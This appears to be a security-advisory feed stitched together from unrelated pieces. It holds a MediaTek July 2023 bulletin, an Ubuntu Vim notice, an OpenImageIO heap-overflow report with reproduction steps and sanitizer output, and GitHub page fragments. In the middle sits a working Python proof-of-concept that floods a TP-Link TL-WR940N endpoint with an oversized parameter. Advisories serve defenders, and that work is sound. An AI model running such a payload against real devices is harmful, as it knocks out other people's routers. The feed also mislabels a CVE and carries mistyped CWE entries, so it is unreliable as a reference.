There is an unauthenticated buffer overflow vulnerability in the process controlling the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in a Denial-of-Service (DoS) condition affecting the web-based management interface of the controller.

CVE-2023-35979

In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07978760; Issue ID: ALPS07363410.

**July 2023 Product Security Bulletin**

Published 2023-07-03

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and Wi-Fi chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2023-20754, CVE-2023-20755

Medium

CVE-2023-20753, CVE-2023-20756, CVE-2023-20757, CVE-2023-20758, CVE-2023-20759, CVE-2023-20760, CVE-2023-20761, CVE-2023-20766, CVE-2023-20767, CVE-2023-20768, CVE-2023-20771, CVE-2023-20772, CVE-2023-20773, CVE-2023-20774, CVE-2023-20775, CVE-2023-20689, CVE-2023-20690, CVE-2023-20691, CVE-2023-20692, CVE-2023-20693, CVE-2022-32666, CVE-2023-20748

****Details****

CVE

**CVE-2023-20754**

Title

Integer overflow or wraparound in keyinstall

Severity

High

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20755**

Title

Improper input validation in keyinstall

Severity

High

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20753**

Title

Out-of-bounds write in rpmb

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In rpmb, there is a possible out of bounds write due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8673, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20756**

Title

Integer overflow or wraparound in keyinstall

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20757**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20758**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20759**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20760**

Title

Improper input validation in apu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In apu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983, MT8195

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20761**

Title

Improper input validation in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8321, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20766**

Title

Improper input validation in gps

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6753, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6886, MT6891, MT6893, MT6895, MT6983, MT6985, MT8167, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20767**

Title

Improper input validation in pqframework

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In pqframework, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT8167, MT8168, MT8195, MT8673

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20768**

Title

Access of resource using incompatible type ('type confusion') in ion

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In ion, there is a possible out of bounds read due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8168, MT8195, MT8321, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2023-20771**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In display, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6761, MT6765, MT6768, MT6771, MT6779, MT6785, MT8168, MT8781

Affected Software Versions

Android 12.0

CVE

**CVE-2023-20772**

Title

Improper authentication in vow

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-287 Improper Authentication

Description

In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6983, MT6985, MT8781, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20773**

Title

Improper authentication in vow

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-287 Improper Authentication

Description

In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6983, MT6985, MT8781, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20774**

Title

Improper input validation in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6789, MT6835, MT6855, MT6886, MT6895, MT6983, MT6985, MT8195, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20775**

Title

Buffer copy without checking size of input ('classic buffer overflow') in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Description

In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6763, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6885, MT6886, MT6889, MT6890, MT6893, MT6895, MT6983, MT6985, MT6990, MT8168, MT8183, MT8195, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0 / OpenWrt 21.02 / RDKB 2022Q3

CVE

**CVE-2023-20689**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20690**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8168, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20691**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20692**

Title

Null pointer dereference in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-476 NULL Pointer Dereference

Description

In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8168, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20693**

Title

Null pointer dereference in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-477 NULL Pointer Dereference

Description

In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6895, MT6983, MT8167, MT8168, MT8195, MT8321, MT8365, MT8385, MT8666, MT8765, MT8781, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2022-32666**

Title

User interface (ui) misrepresentation of critical information in Wi-Fi

Severity

Medium

Vulnerability Type

DoS

CWE

CW3-451 User Interface (UI) Misrepresentation of Critical Information

Description

In Wi-Fi, there is a possible low throughput due to misrepresentation of critical information. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7915, MT7916, MT7981, MT7986, MT8365

Affected Software Versions

7.6.6.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20748**

Title

Improper input validation in display

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

July 3, 2023

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2023-20775: July 2023

Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6195-1  
July 03, 2023

vim vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Vim.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim contained an out-of-bounds read vulnerability.  
An attacker could possibly use this issue to cause a denial of service or  
execute arbitrary code. (CVE-2022-0128)

It was discovered that Vim did not properly manage memory when freeing  
allocated memory. An attacker could possibly use this issue to cause a  
denial of service or execute arbitrary code. (CVE-2022-0156)

It was discovered that Vim contained a heap-based buffer overflow  
vulnerability. An attacker could possibly use this issue to cause a denial  
of service or execute arbitrary code. (CVE-2022-0158)

It was discovered that Vim did not properly manage memory when recording  
and using select mode. An attacker could possibly use this issue to cause  
a denial of service. (CVE-2022-0393)

It was discovered that Vim incorrectly handled certain memory operations  
during a visual block yank. An attacker could possibly use this issue to  
cause a denial of service or execute arbitrary code. (CVE-2022-0407)

It was discovered that Vim contained a NULL pointer dereference  
vulnerability when switching tabpages. An attacker could possible use this  
issue to cause a denial of service. (CVE-2022-0696)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   vim                             2:8.2.3995-1ubuntu2.9  
   vim-athena                      2:8.2.3995-1ubuntu2.9  
   vim-gtk3                        2:8.2.3995-1ubuntu2.9  
   vim-nox                         2:8.2.3995-1ubuntu2.9  
   vim-tiny                        2:8.2.3995-1ubuntu2.9  
   xxd                             2:8.2.3995-1ubuntu2.9

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6195-1  
   CVE-2022-0128, CVE-2022-0156, CVE-2022-0158, CVE-2022-0393,  
   CVE-2022-0407, CVE-2022-0696

Package Information:  
   https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.9

Ubuntu Security Notice USN-6195-1

TP-Link TL-WR940N version 4 suffers from a buffer overflow vulnerability.

    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with a crafted payload that triggers the buffer overflowpayload = 'A' * 5000  # Example payload, adjust the length as needed# Send the GET request with the crafted payloadresponse = requests.get(url + payload)# Check the response status codeif response.status_code == 200:    print('Buffer overflow triggered successfully')else:    print('Buffer overflow not triggered')

TP-Link TL-WR940N 4 Buffer Overflow

Buffer Overflow vulnerability in OpenImageIO v.2.4.12.0 and before allows a remote to execute arbitrary code and obtain sensitive information via a crafted file to the readimg function.

Describe the bug:  
Hi, I found heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert poc /tmp/res

poc file:  
poc1.zip

Evidence:  
\==617==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a602 at pc 0x7f30d95a9823 bp 0x7ffc9cd71f10 sp 0x7ffc9cd71f08  
READ of size 1 at 0x60200000a602 thread T0  
#0 0x7f30d95a9822 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36  
#1 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#2 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#3 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#4 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#5 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#6 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#7 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#8 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#9 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#10 0x7f30d6b32e3f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#11 0x5620dabd1054 in \_start (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0x28054) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)

0x60200000a602 is located 10 bytes to the right of 8-byte region \[0x60200000a5f0,0x60200000a5f8)  
allocated by thread T0 here:  
#0 0x5620dac8ec6d in operator new(unsigned long) (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0xe5c6d) (BuildId: dee6af2e834643e5fa1ac02b9cc829ac746f39a2)  
#1 0x7f30d95a7924 in \_\_gnu\_cxx::new\_allocator::allocate(unsigned long, void const\*) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/ext/new\_allocator.h:127:27  
#2 0x7f30d95a7924 in std::allocator\_traits<std::allocator >::allocate(std::allocator&, unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/alloc\_traits.h:464:20  
#3 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_allocate(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:346:20  
#4 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_M\_create\_storage(unsigned long) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:361:33  
#5 0x7f30d95a7924 in std::\_Vector\_base<unsigned char, std::allocator >::\_Vector\_base(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:305:9  
#6 0x7f30d95a7924 in std::vector<unsigned char, std::allocator >::vector(unsigned long, std::allocator const&) /usr/lib/gcc/x86\_64-linux-gnu/11/../../../../include/c++/11/bits/stl\_vector.h:511:9  
#7 0x7f30d95a7924 in OpenImageIO\_v2\_4::ICOInput::readimg() /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:308:32  
#8 0x7f30d95aa6c2 in OpenImageIO\_v2\_4::ICOInput::read\_native\_scanline(int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:429:14  
#9 0x7f30d90fd4e0 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:399:19  
#10 0x7f30d90fd9c2 in OpenImageIO\_v2\_4::ImageInput::read\_native\_scanlines(int, int, int, int, int, int, int, void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:420:16  
#11 0x7f30d90fad9e in OpenImageIO\_v2\_4::ImageInput::read\_scanlines(int, int, int, int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:336:15  
#12 0x7f30d9109c51 in OpenImageIO\_v2\_4::ImageInput::read\_image(int, int, int, int, OpenImageIO\_v2\_4::TypeDesc, void\*, long, long, long, bool (_)(void_, float), void\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:967:23  
#13 0x7f30d9197dd7 in OpenImageIO\_v2\_4::ImageOutput::copy\_image(OpenImageIO\_v2\_4::ImageInput\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageoutput.cpp:588:19  
#14 0x5620dac9426c in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:449:27  
#15 0x5620dac99221 in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#16 0x7f30d6b32d8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0\_1/src/ico.imageio/icoinput.cpp:326:36 in OpenImageIO\_v2\_4::ICOInput::readimg()  
Shadow bytes around the buggy address:  
0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9480: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff9490: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 00 07  
0x0c047fff94a0: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fa  
0x0c047fff94b0: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 fa  
\=>0x0c047fff94c0:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==617==ABORTING

Platform information:  
OIIO branch/version: 2.4.12  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-36183: [BUG] Heap-buffer-overflow in function ICOInput::readimg in file src/ico.imageio/icoinput.cpp · Issue #3871 · OpenImageIO/oiio

Buffer Overflow vulnerability in mtrojnar osslsigncode v.2.3 and before allows a local attacker to execute arbitrary code via a crafted .exe, .sys, and .dll files.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

*   Notifications
*   Fork 112

*   Code
*   Issues 7
*   Pull requests 2
*   Actions
*   Projects
*   Security
*   Insights

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ mtrojnar/osslsigncode _base:_ 2.2

_head repository:_ mtrojnar/osslsigncode _compare:_ 2.3

